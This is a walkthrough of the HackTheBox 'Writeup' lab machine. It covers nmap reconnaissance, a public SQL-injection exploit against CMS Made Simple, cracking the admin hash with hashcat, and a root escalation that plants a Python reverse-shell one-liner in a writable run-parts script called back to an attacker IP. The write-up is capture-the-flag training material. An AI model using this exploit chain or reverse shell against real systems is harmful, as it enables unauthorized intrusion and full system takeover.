Writeup(Hackthebox) Machine Walkthrough
We start off as always with a nmap scan to see what kind of ports are open
nmap -sC -sV -A 10.10.10.138
All we get is a SSH and Apache. So starting with port 80
So,lets check robots.txt first and we got /writeup/
We then get a sub site named writeup, we can go to that via
we need to find in order to exploit it.
If we use wappalyzer it tells us that its made of ‘CMS made simple’
We can then use searchsploit and Google search to find any exploits for these that runs through a website
Usage:
parser = optparse.OptionParser()
parser.add_option(‘-u’, ‘ — url’, action=”store”, dest=”url”, help=”Base target uri (ex. http://10.10.10.100/cms)")
parser.add_option(‘-w’, ‘ — wordlist’, action=”store”, dest=”wordlist”, help=”Wordlist for crack admin password”)
parser.add_option(‘-c’, ‘ — crack’, action=”store_true”, dest=”cracking”, help=”Crack password with wordlist”, default=False)
options, args = parser.parse_args()
if not options.url:
print “[+] Specify an url target”
print “[+] Example usage (no cracking password): exploit.py -u http://target-uri"
print “[+] Example usage (with cracking password): exploit.py -u http://target-uri — crack -w /path-wordlist”
print “[+] Setup the variable TIME with an appropriate time, because this sql injection is a time based.”
exit()
It can use –u for url –w for wordlist and –c for crack
Python 46635.py –u http://10.10.10.138/writeup/ -c –w rockyou.txt
Now in my case password is not cracked by script so I use hashcat on -m 20 with
HASH=62def4866937f08cc13bab43bc5y4:5a599ef579066807
We then a cracked password ‘raykayjay9’ After that we can connect the box ssh and get user
User: d4e493fd4068afc9eb1*************
Now getting into Root
use pspy64
After observing here for a while you find that a script is running
This is run-parts and that is located in a PATH, This run-parts is writable from the user and executed by root
So we just write to that with a reverse shell exploit.
Python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.12.**”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);
Just change my ip address with yours and on another tab use netcat
nc –lvp 1234
Now open another tab and access ssh again so we got reverse shell as root on netcat tab
Root: eeba47f60b48ef92b7**************